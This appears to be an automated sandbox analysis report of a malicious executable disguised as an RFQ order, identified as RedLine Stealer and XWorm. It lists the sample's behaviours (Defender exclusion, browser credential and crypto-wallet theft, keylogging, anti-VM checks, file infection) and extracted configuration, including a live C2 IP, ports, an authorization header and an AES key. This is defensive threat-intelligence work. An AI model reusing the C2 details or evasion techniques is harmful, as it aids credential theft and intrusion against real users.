Windows Analysis Report
RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe

Overview

General Information

Sample name: RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe
Analysis ID: 1648323
MD5: bdc0ab5de23971ea6e703b790c0e935d
SHA1: e7e1031784fc26bc12437d509e3b98975df69ede
SHA256: d9a96e9b62e5b913df31e846590ce1e0443a43eeec2d0f091e60d82e44f7aa92
Tags: exe, user-threatcat_ch

Detection

RedLine, XWorm
Score: 100
Range: 0 - 100
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Sigma detected: Drops script at startup location
Suricata IDS alerts for network traffic
Yara detected RedLine Stealer
Yara detected XWorm
Adds a directory exclusion to Windows Defender
Binary is likely a compiled AutoIt script file
Bypasses PowerShell execution policy
C2 URLs / IPs found in malware configuration
Connects to many ports of the same IP (likely port scanning)
Contains functionality to behave differently if executed on a Russian/Kazakh computer
Creates files in the system32 config directory
Drops VBS files to the startup folder
Drops executable to a common third party application directory
Found direct / indirect Syscall (likely to bypass EDR)
Found many strings related to Crypto-Wallets (likely being stolen)
Infects executable files (exe, dll, sys, html)
Initial sample is a PE file and has a suspicious name
Joe Sandbox ML detected suspicious sample
Loading BitLocker PowerShell Module
Maps a DLL or memory area into another process
Queries random domain names (often used to prevent blacklisting and sinkholes)
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sample uses string decryption to hide its real strings
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: Suspicious Script Execution From Temp Folder
Sigma detected: WScript or CScript Dropper
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Crypto Currency Wallets
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Connects to many different domains
Contains functionality for reading data from the clipboard
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Creates files inside the system directory
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
Enables driver privileges
Enables security privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain checking for process token information
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
One or more processes crash
PE file contains an invalid checksum
PE file contains executable resources (Code or Archives)
PE file contains more sections than normal
PE file contains sections with non-standard names
Potential key logger detected (key state polling based)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Powershell Defender Exclusion
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores files to the Windows start menu directory
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

Classification chart labels: Ransomware, Spreading, Phishing, Banker, Trojan / Bot, Adware, Spyware, Exploiter, Evader, Miner; scale: clean, suspicious, malicious

Name: RedLine Stealer
Description: RedLine Stealer is a malware available on underground forums for sale, apparently as a standalone ($100/$150 depending on the version) or on a subscription basis ($100/month). This malware harvests information from browsers such as saved credentials, autocomplete data, and credit card information. A system inventory is also taken when running on a target machine, including details such as the username, location data, hardware configuration, and information regarding installed security software. More recent versions of RedLine added the ability to steal cryptocurrency. FTP and IM clients are also apparently targeted by this family, and this malware has the ability to upload and download files, execute commands, and periodically send back information about the infected computer.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.redline_stealer

Name: XWorm
Description: Malware with a wide range of capabilities ranging from RAT to ransomware.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.xworm

AV Detection

Source: RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe Avira: detected
Source: C:\Program Files (x86)\AutoIt3\Au3Check.exe Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exe Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Java\jre-1.8\bin\ktab.exe Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Java\jre-1.8\bin\jjs.exe Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java-rmi.exe Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Java\jre-1.8\bin\kinit.exe Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javacpl.exe Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\AutoIt3\Au3Info.exe Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exe Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exe Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Java\jre-1.8\bin\keytool.exe Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exe Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Java\jre-1.8\bin\jabswitch.exe Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exe Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Java\jre-1.8\bin\orbd.exe Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Java\jre-1.8\bin\pack200.exe Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Java\jre-1.8\bin\klist.exe Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Java\jre-1.8\bin\jp2launcher.exe Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Google\GoogleUpdater\135.0.7023.0\updater.exe Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\AutoIt3\AutoIt3Help.exe Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exe Avira: detection malicious, Label: W32/Infector.Gen
Source: 00000005.00000002.1272520755.0000000003CB4000.00000004.00000800.00020000.00000000.sdmp Malware Configuration Extractor: RedLine {"C2 url": ["204.10.161.147:7082"], "Bot Id": "success", "Authorization Header": "c74790bd166600f1f665c8ce201776eb"}
Source: 00000005.00000002.1271729199.0000000002CF4000.00000004.00000800.00020000.00000000.sdmp Malware Configuration Extractor: Xworm {"C2 url": ["204.10.161.147"], "Port": 7081, "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V5.6"}
Source: RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe Virustotal: Detection: 74%
Source: RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe ReversingLabs: Detection: 83%
Source: Submitted Sample Integrated Neural Analysis Model: Matched 100.0% probability
Source: 00000005.00000002.1271729199.0000000002CF4000.00000004.00000800.00020000.00000000.sdmp String decryptor: 204.10.161.147
Source: 00000005.00000002.1271729199.0000000002CF4000.00000004.00000800.00020000.00000000.sdmp String decryptor: 7081
Source: 00000005.00000002.1271729199.0000000002CF4000.00000004.00000800.00020000.00000000.sdmp String decryptor: <123456789>
Source: 00000005.00000002.1271729199.0000000002CF4000.00000004.00000800.00020000.00000000.sdmp String decryptor: <Xwormmm>
Source: 00000005.00000002.1271729199.0000000002CF4000.00000004.00000800.00020000.00000000.sdmp String decryptor: XWorm V5.6
Source: 00000005.00000002.1271729199.0000000002CF4000.00000004.00000800.00020000.00000000.sdmp String decryptor: USB.exe
Source: 00000005.00000002.1271729199.0000000002CF4000.00000004.00000800.00020000.00000000.sdmp String decryptor: %AppData%
Source: 00000005.00000002.1271729199.0000000002CF4000.00000004.00000800.00020000.00000000.sdmp String decryptor: XClient.exe
Source: RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
Source: Binary string: C:\work\p4\splinters\Splinters\S\BuildResults\bin\Win32\ReaderRelease\FullTrustNotifier\FullTrustNotifier.pdb77.GCTL source: alg.exe, 00000003.00000003.1667592386.0000000001450000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: $$.pdb source: RegSvcs.exe, 00000015.00000002.1436320311.0000000000779000.00000004.00000010.00020000.00000000.sdmp
Source: Binary string: RegSvcs.pdbr source: RegSvcs.exe, 00000015.00000002.1436320311.0000000000779000.00000004.00000010.00020000.00000000.sdmp
Source: Binary string: D:\DCB\CBT_Main\BuildResults\bin\Win32\Release\armsvc.pdb source: RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe, 00000000.00000003.1221869185.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: E:\PkgInstaller\base\ntsetup\SrvPack.Main\tools\sfxcab\sfxcab\objfre\i386\sfxcab.pdb source: alg.exe, 00000003.00000003.1741573963.0000000001450000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000003.00000003.1751690335.0000000000530000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000003.00000003.1740392594.0000000001440000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: C:\Windows\mscorlib.pdbpdblib.pdb source: RegSvcs.exe, 00000015.00000002.1437238320.0000000000976000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: D:\T\BuildResults\bin\Release_x64\AcrobatInfo.pdb source: alg.exe, 00000003.00000003.1373522037.00000000014E0000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: D:\T\BuildResults\bin\Release_x64\TextExtractor.pdb444 source: alg.exe, 00000003.00000003.1525511064.00000000014E0000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: D:\T\BuildResults\bin\Release_x64\TextExtractor.pdb source: alg.exe, 00000003.00000003.1525511064.00000000014E0000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\mscorlib.pdb source: RegSvcs.exe, 00000015.00000002.1437238320.0000000000976000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ADelRCP_Exec.pdb source: alg.exe, 00000003.00000003.1538669314.0000000001450000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: mavinject32.pdbGCTL source: alg.exe, 00000003.00000003.1829809369.0000000001450000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000003.00000003.1826627014.0000000001570000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: PresentationFontCache.pdb source: elevation_service.exe, 0000000A.00000003.2462788704.0000000000830000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.PDB source: RegSvcs.exe, 00000015.00000002.1436320311.0000000000779000.00000004.00000010.00020000.00000000.sdmp
Source: Binary string: crashreporter.pdb source: alg.exe, 00000003.00000003.2099214565.0000000001450000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: exhilaratingly.exe, 00000004.00000003.1250656457.00000000049D0000.00000004.00001000.00020000.00000000.sdmp, exhilaratingly.exe, 00000004.00000003.1251704935.0000000004B70000.00000004.00001000.00020000.00000000.sdmp, exhilaratingly.exe, 00000014.00000003.1386854712.00000000050A0000.00000004.00001000.00020000.00000000.sdmp, exhilaratingly.exe, 00000014.00000003.1372833431.0000000004900000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: D:\T\BuildResults\bin\Release_x64\WebInstaller\AcroMiniServicesUpdater.pdb source: alg.exe, 00000003.00000003.1490257578.00000000014E0000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: D:\T\BuildResults\bin\Release_x64\plug_ins\pi_brokers\MSRMSPIBroker.pdbAAAGCTL source: alg.exe, 00000003.00000003.1659027257.0000000001450000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: D:\dbs\el\omr\Target\x64\ship\click2run\x-none\InspectorOfficeGadget.pdb source: alg.exe, 00000003.00000003.1801207586.0000000001440000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: D:\T\Acrobat\Installers\ShowAppPickerForPDF\Release_x64\ShowAppPickerForPDF.pdb source: alg.exe, 00000003.00000003.1677652221.0000000001450000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000003.00000003.1686851287.0000000000530000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: RegSvcs.pdb source: RegSvcs.exe, 00000015.00000002.1437238320.00000000009BA000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000015.00000002.1436320311.0000000000779000.00000004.00000010.00020000.00000000.sdmp
Source: Binary string: RegSvcs.pdbegSvcs.pdbpdbvcs.pdbv4.0.30319\RegSvcs.pdb source: RegSvcs.exe, 00000015.00000002.1436320311.0000000000779000.00000004.00000010.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.pdbdo source: RegSvcs.exe, 00000015.00000002.1437238320.0000000000976000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: D:\T\BuildResults\bin\Release_x64\WCChromeNativeMessagingHost.pdb888 source: alg.exe, 00000003.00000003.1562647186.0000000001450000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: Acrobat_SL.pdb((( source: alg.exe, 00000003.00000003.1391605878.00000000014E0000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: ?'oC:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.pdb source: RegSvcs.exe, 00000015.00000002.1436320311.0000000000779000.00000004.00000010.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\symbols\exe\RegSvcs.pdb source: RegSvcs.exe, 00000015.00000002.1437238320.0000000000948000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: @'o.pdb source: RegSvcs.exe, 00000015.00000002.1436320311.0000000000779000.00000004.00000010.00020000.00000000.sdmp
Source: Binary string: DiagnosticsHub.StandardCollector.Service.pdbGCTL source: elevation_service.exe, 0000000A.00000003.2441683485.0000000000830000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: o0C:\Windows\RegSvcs.pdb source: RegSvcs.exe, 00000015.00000002.1436320311.0000000000779000.00000004.00000010.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdbW source: RegSvcs.exe, 00000015.00000002.1437238320.0000000000948000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ADelRCP_Exec.pdbCC9 source: alg.exe, 00000003.00000003.1538669314.0000000001450000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: D:\T\BuildResults\bin\Release_x64\AcroBroker.pdb source: alg.exe, 00000003.00000003.1418745424.00000000014E0000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: Acrobat_SL.pdb source: alg.exe, 00000003.00000003.1391605878.00000000014E0000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: E:\PkgInstaller\base\ntsetup\SrvPack.Main\tools\sfxcab\sfxcab\objfre\i386\sfxcab.pdbU source: alg.exe, 00000003.00000003.1741573963.0000000001450000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000003.00000003.1751690335.0000000000530000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000003.00000003.1740392594.0000000001440000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\RegSvcs.pdb source: RegSvcs.exe, 00000015.00000002.1437238320.0000000000976000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\mscorlib.pdbB source: RegSvcs.exe, 00000015.00000002.1437238320.0000000000976000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\mscorlib.pdb source: RegSvcs.exe, 00000015.00000002.1437238320.0000000000976000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: D:\T\BuildResults\bin\Release_x64\WebInstaller\AcroMiniServicesUpdater.pdbT source: alg.exe, 00000003.00000003.1490257578.00000000014E0000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: C:\workspace\CR-Windows-x64-Client-Builder\x64\Release\CRWindowsClientService.pdbGG source: alg.exe, 00000003.00000003.1585909463.0000000001450000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: D:\T\BuildResults\bin\Release_x64\AcrobatInfo.pdb))) source: alg.exe, 00000003.00000003.1373522037.00000000014E0000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: mavinject32.pdb source: alg.exe, 00000003.00000003.1829809369.0000000001450000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000003.00000003.1826627014.0000000001570000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: maintenanceservice.pdb source: alg.exe, 00000003.00000003.1281053363.0000000001640000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: 64BitMAPIBroker.pdb source: alg.exe, 00000003.00000003.1646234871.0000000001450000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: msdtcexe.pdbGCTL source: elevation_service.exe, 0000000A.00000003.2468045402.0000000000830000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: D:\dbs\el\omr\Target\x64\ship\click2run\x-none\InspectorOfficeGadget.pdbY source: alg.exe, 00000003.00000003.1801207586.0000000001440000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: E:\jenkins\workspace\NGL_WORKFLOW\build\master\win64\Release\Acrobat\project\win\ngl-workflow\x64\Release (Acrobat)\adobe_licensing_wf_helper_acro.pdb source: alg.exe, 00000003.00000003.1632221337.0000000001450000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: D:\T\BuildResults\bin\Release_x64\WCChromeNativeMessagingHost.pdb source: alg.exe, 00000003.00000003.1562647186.0000000001450000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: D:\T\BuildResults\bin\Release\Plug_ins\pi_brokers\32BitMAPIBroker.pdb@@ source: alg.exe, 00000003.00000003.1637197730.0000000001450000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: C:\workspace\CR-Windows-x64-Client-Builder\x64\Release\CRWindowsClientService.pdb source: alg.exe, 00000003.00000003.1585909463.0000000001450000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: C:\work\p4\splinters\Splinters\S\BuildResults\bin\Win32\ReaderRelease\FullTrustNotifier\FullTrustNotifier.pdb source: alg.exe, 00000003.00000003.1667592386.0000000001450000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: wsymbols\exe\RegSvcs.pdb source: RegSvcs.exe, 00000015.00000002.1436320311.0000000000779000.00000004.00000010.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.PDBs source: RegSvcs.exe, 00000015.00000002.1437238320.0000000000976000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: D:\T\BuildResults\bin\Release_x64\plug_ins\pi_brokers\MSRMSPIBroker.pdb source: alg.exe, 00000003.00000003.1659027257.0000000001450000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: maintenanceservice.pdb` source: alg.exe, 00000003.00000003.1281053363.0000000001640000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: D:\T\Acrobat\Installers\ShowAppPickerForPDF\Release_x64\ShowAppPickerForPDF.pdb$$ source: alg.exe, 00000003.00000003.1677652221.0000000001450000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000003.00000003.1686851287.0000000000530000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: wntdll.pdbUGP source: exhilaratingly.exe, 00000004.00000003.1250656457.00000000049D0000.00000004.00001000.00020000.00000000.sdmp, exhilaratingly.exe, 00000004.00000003.1251704935.0000000004B70000.00000004.00001000.00020000.00000000.sdmp, exhilaratingly.exe, 00000014.00000003.1386854712.00000000050A0000.00000004.00001000.00020000.00000000.sdmp, exhilaratingly.exe, 00000014.00000003.1372833431.0000000004900000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: D:\T\BuildResults\bin\Release_x64\Eula.pdb source: alg.exe, 00000003.00000003.1593228986.0000000001450000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: ALG.pdb source: RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe, 00000000.00000003.1226639947.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\RegSvcs.pdb* source: RegSvcs.exe, 00000015.00000002.1437238320.0000000000976000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: msdtcexe.pdb source: elevation_service.exe, 0000000A.00000003.2468045402.0000000000830000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: DiagnosticsHub.StandardCollector.Service.pdb source: elevation_service.exe, 0000000A.00000003.2441683485.0000000000830000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: ALG.pdbGCTL source: RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe, 00000000.00000003.1226639947.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: PresentationFontCache.pdbHt^t Pt_CorExeMainmscoree.dll source: elevation_service.exe, 0000000A.00000003.2462788704.0000000000830000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: D:\T\BuildResults\bin\Release_x64\AcroBroker.pdbTTT source: alg.exe, 00000003.00000003.1418745424.00000000014E0000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\exe\RegSvcs.pdb source: RegSvcs.exe, 00000015.00000002.1437238320.0000000000976000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: AppVShNotify.pdb source: alg.exe, 00000003.00000003.1780210490.0000000001450000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: D:\T\BuildResults\bin\Release\Plug_ins\pi_brokers\32BitMAPIBroker.pdb source: alg.exe, 00000003.00000003.1637197730.0000000001450000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: D:\T\BuildResults\bin\Release_x64\Eula.pdb888 source: alg.exe, 00000003.00000003.1593228986.0000000001450000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: AppVShNotify.pdbGCTL source: alg.exe, 00000003.00000003.1780210490.0000000001450000.00000004.00001000.00020000.00000000.sdmp

Spreading

Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Java\jre-1.8\bin\javaws.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\msedgewebview2.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Microsoft\EdgeCore\117.0.2045.47\BHO\ie_to_edge_stub.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Mozilla Firefox\pingsender.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Microsoft Office\Office16\OSPPREARM.EXE
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Microsoft\EdgeCore\117.0.2045.47\msedgewebview2.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Microsoft\EdgeCore\117.0.2045.47\msedge_pwa_launcher.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Google\GoogleUpdater\135.0.7023.0\updater.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Mozilla Firefox\default-browser-agent.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Java\jre-1.8\bin\ssvagent.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\filecompare.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\7-Zip\7z.exe
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\elevation_service.exe System file written: C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe
Source: C:\Users\user\Desktop\RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe System file written: C:\Windows\System32\AppVClient.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Mozilla Firefox\crashreporter.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\7-Zip\7zG.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\MavInject32.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Java\jre-1.8\bin\keytool.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Microsoft\EdgeCore\117.0.2045.47\msedge_proxy.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Google\Chrome\Application\134.0.6998.36\elevation_service.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\AutoIt3\AutoIt3Help.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\identity_helper.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate64.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Google\Chrome\Application\134.0.6998.36\os_update_handler.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\msedge_proxy.exe
